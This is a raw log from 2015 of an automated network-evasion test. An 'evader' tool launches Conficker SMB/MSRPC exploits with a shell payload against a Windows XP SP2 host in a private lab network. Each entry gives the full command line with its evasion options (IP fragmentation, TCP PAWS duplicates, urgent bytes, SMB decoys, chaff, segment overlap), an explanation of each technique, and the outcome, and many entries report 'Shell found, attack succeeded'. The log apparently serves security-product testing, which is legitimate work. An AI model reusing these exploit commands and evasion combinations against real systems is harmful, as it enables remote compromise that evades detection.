- 469 runs averaging 1.24 runs / second ; progress: 378/43200
- 469 runs averaging 1.23 runs / second ; progress: 383/43200
- 469 runs averaging 1.21 runs / second ; progress: 388/43200.........
- 478 runs averaging 1.22 runs / second ; progress: 393/43200....Pid 10878 timed out - killed
- 2015-11-29 14:32:25 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56599 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=23M8v1hEoSg --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"50%","empty_unspec|small_unspec|http_get" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 23M8v1hEoSj
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.110:56599 -> 10.35.1.207:445
- Terminated
- .....2015-11-29 14:32:28 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36269 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GVmZYMBCo6c --evasion=[smb_connect,end]ipv4_frag,"464" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","116466038","zero" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed GVmZYMBCo6c
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 464 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 116466038> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 8 and 65534 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:36269 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 490 runs averaging 1.23 runs / second ; progress: 398/43200..Pid 10949 timed out - killed
- 2015-11-29 14:32:30 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44674 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wBfabVk6tio --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"1","4","402","zero" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"21","72020197","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed wBfabVk6tir
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72020197> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 402 bytes of zeroes.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.114:44674 -> 10.35.1.207:445
- Terminated
- ..............
- 507 runs averaging 1.26 runs / second ; progress: 403/43200.Pid 11049 timed out - killed
- 2015-11-29 14:32:34 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20633 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=nYnMAcjCpmw --evasion=[smb_openpipe,msrpc_bind]smb_chaff,"1","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]tcp_urgent,"8","random" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nYnMAcjCpmy
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Add a random urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 1th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.116:20633 -> 10.35.1.207:445
- Terminated
- .........
- 518 runs averaging 1.27 runs / second ; progress: 408/43200......2015-11-29 14:32:41 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55872 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=AI55OQEvx44 --evasion=[smb_connect,smb_opentree]tcp_paws,"1","10","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AI55OQEvx44
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:43937 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...........
- 27056 runs averaging 1.75 runs / second ; progress: 15463/43200.....2015-11-29 18:43:38 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37311 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=wyvgfRwwEMY --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"696","zero" --evasion=[smb_connect,end]tcp_paws,"5","268435454","random" --verifydelay=1000 --payload=shell
- Info: Using random seed wyvgfRwwEMb
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 696 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- Info: NetBIOS connection 10.62.90.118:37311 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 27063 runs averaging 1.75 runs / second ; progress: 15468/43200.....
- 27068 runs averaging 1.75 runs / second ; progress: 15473/43200........Pid 30630 timed out - killed
- 2015-11-29 18:43:47 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11483 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=I2UFterCp8Q --evasion=[smb_opentree,end]smb_decoytrees,"5","4","1","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"13","nullchksum|shorthdr|longhdr","random" --evasion=[netbios_connect,end]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed I2UFterCp8Q
- The following evasions are applied from stage netbios_connect to end:
- - Add a zero urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random bytes.
- Info: NetBIOS connection 10.62.90.112:11483 -> 10.35.1.207:445
- Terminated
- .2015-11-29 18:43:48 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55625 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=avb+WdU5Of4 --evasion=[start,end]tcp_paws,"1","268435454","random_alphanum" --evasion=[msrpc_bind,end]tcp_segvar,"16208","65535" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed avb+WdU5Of5
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP packets are segmented to contain between 16208 and 65535 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:55625 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 27080 runs averaging 1.75 runs / second ; progress: 15478/43200.........
- 27089 runs averaging 1.75 runs / second ; progress: 15483/43200..............
- 27103 runs averaging 1.75 runs / second ; progress: 15488/43200..........
- 27113 runs averaging 1.75 runs / second ; progress: 15494/43200.......
- 27120 runs averaging 1.75 runs / second ; progress: 15499/43200.....
- 27125 runs averaging 1.75 runs / second ; progress: 15504/43200..............
- 27139 runs averaging 1.75 runs / second ; progress: 15509/43200.............2015-11-29 18:44:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57484 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7SAxpWZ4/YA --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 7SAxpWZ4/YD
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:57484 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 27156 runs averaging 1.75 runs / second ; progress: 15514/43200..........2015-11-29 18:44:26 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64704 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/auJxU4Kc4s --evasion=[start,end]tcp_paws,"25%","3","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"2","1","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed /auJxU4Kc4v
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:64704 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...................
- 27186 runs averaging 1.75 runs / second ; progress: 15519/43200.........................
- 27211 runs averaging 1.75 runs / second ; progress: 15524/43200........2015-11-29 18:44:37 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24056 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=6n+RdaEVnnA --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"1","4","2046","random" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 6n+RdaEVnnD
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 2046 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.115:24056 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 27228 runs averaging 1.75 runs / second ; progress: 15529/43200..............
- 27242 runs averaging 1.75 runs / second ; progress: 15534/43200..........
- 27252 runs averaging 1.75 runs / second ; progress: 15539/43200.............2015-11-29 18:44:52 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26003 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=XAiIoFWwcfc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","5","695","random_msrpcbind" --evasion=[start,end]tcp_initialseq,"4294967293" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed XAiIoFWwcfd
- - Initial TCP sequence number is set to 0xffffffff - 4294967293
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 695 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:26003 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..........
- 27276 runs averaging 1.75 runs / second ; progress: 15544/43200...........
- 27287 runs averaging 1.75 runs / second ; progress: 15549/43200...Pid 31683 timed out - killed
- 2015-11-29 18:45:00 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55926 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=aGAi08H15y0 --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"72" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed aGAi08H15y1
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 72 bytes per fragment
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:55926 -> 10.35.1.207:445
- Terminated
- ..............
- 27305 runs averaging 1.76 runs / second ; progress: 15554/43200......2015-11-29 18:45:09 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30801 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hx3QRcDiL+U --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","9","random_alphanum" --evasion=[netbios_connect,end]tcp_timewait,"3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hx3QRcDiL+W
- The following evasions are applied from stage netbios_connect to end:
- - 3 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:30801 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27314 runs averaging 1.76 runs / second ; progress: 15559/43200.........2015-11-29 18:45:11 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49130 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=f/d/WoCn4s8 --evasion=[netbios_connect,msrpc_bind]tcp_chaff,"25%","nullflag|outofwindow|longhdr","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed f/d/WoCn4s9
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.116:49130 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..................................
- 27358 runs averaging 1.76 runs / second ; progress: 15564/43200...............
- 27373 runs averaging 1.76 runs / second ; progress: 15569/43200...................
- 27392 runs averaging 1.76 runs / second ; progress: 15574/43200..............2015-11-29 18:45:29 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17524 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DsBpCDc6WlQ --evasion=[start,end]ipv4_frag,"1472" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","3","random" --verifydelay=1000 --payload=shell
- Info: Using random seed DsBpCDc6WlQ
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.119:17524 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 27408 runs averaging 1.76 runs / second ; progress: 15579/43200................2015-11-29 18:45:34 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Ch09Osy0JA4 --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"25%","chksum|outofwindow|longhdr","random_alphanum" --evasion=[start,end]tcp_paws,"21","14850612","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"50%","30115434","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Ch09Osy0JA4
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14850612> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 30115434> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:41391 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 27430 runs averaging 1.76 runs / second ; progress: 15584/43200.................2015-11-29 18:45:39 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62870 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=hcPJC8sYLrg --evasion=[smb_opentree,end]netbios_chaff,"25%","http_get|msrpc_req|broken_length" --evasion=[netbios_connect,end]tcp_paws,"2","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed hcPJC8sYLri
- The following evasions are applied from stage netbios_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.119:62870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27450 runs averaging 1.76 runs / second ; progress: 15589/43200.............
- 27463 runs averaging 1.76 runs / second ; progress: 15594/43200Pid 32419 timed out - killed
- 2015-11-29 18:45:48 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24326 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=bPs+NuUP/pQ --evasion=[start,smb_opentree]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bPs+NuUP/pR
- The following evasions are applied from stage start to smb_opentree:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.114:24326 -> 10.35.1.207:445
- Terminated
- .
- 27465 runs averaging 1.76 runs / second ; progress: 15599/43200.....
- 27470 runs averaging 1.76 runs / second ; progress: 15604/43200..............
- 27484 runs averaging 1.76 runs / second ; progress: 15609/43200....................
- 27504 runs averaging 1.76 runs / second ; progress: 15614/43200..................
- 27522 runs averaging 1.76 runs / second ; progress: 15619/43200....
- 27526 runs averaging 1.76 runs / second ; progress: 15624/43200..........
- 27536 runs averaging 1.76 runs / second ; progress: 15629/43200...............
- 27551 runs averaging 1.76 runs / second ; progress: 15634/43200........................
- 27575 runs averaging 1.76 runs / second ; progress: 15640/43200...........
- 27586 runs averaging 1.76 runs / second ; progress: 15645/43200............
- 27598 runs averaging 1.76 runs / second ; progress: 15650/43200.........
- 27607 runs averaging 1.76 runs / second ; progress: 15655/43200..2015-11-29 18:46:47 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59721 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=891bOi00Urw --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[smb_opentree,end]tcp_paws,"5","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 891bOi00Urz
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 80 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:59721 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..................
- 27628 runs averaging 1.76 runs / second ; progress: 15660/43200..................
- 27646 runs averaging 1.76 runs / second ; progress: 15665/43200.........
- 27655 runs averaging 1.76 runs / second ; progress: 15670/43200.2015-11-29 18:47:01 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=GNVZQxmNpFE --evasion=[msrpc_bind,end]smb_decoytrees,"3","4","1","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed GNVZQxmNpFE
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 3 SMB trees are opened and 4 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.117:33922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 27664 runs averaging 1.76 runs / second ; progress: 15675/43200............
- 27676 runs averaging 1.77 runs / second ; progress: 15680/43200.........
- 27685 runs averaging 1.77 runs / second ; progress: 15685/43200......2015-11-29 18:47:18 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23932 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=eZYvNY6iczk --evasion=[smb_connect,smb_openpipe]smb_writeandxpad,"858","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed eZYvNY6iczl
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 858 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:23932 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 27696 runs averaging 1.77 runs / second ; progress: 15690/43200.Pid 956 timed out - killed
- 2015-11-29 18:47:21 INFO
- Timed out (10.62.90.111):
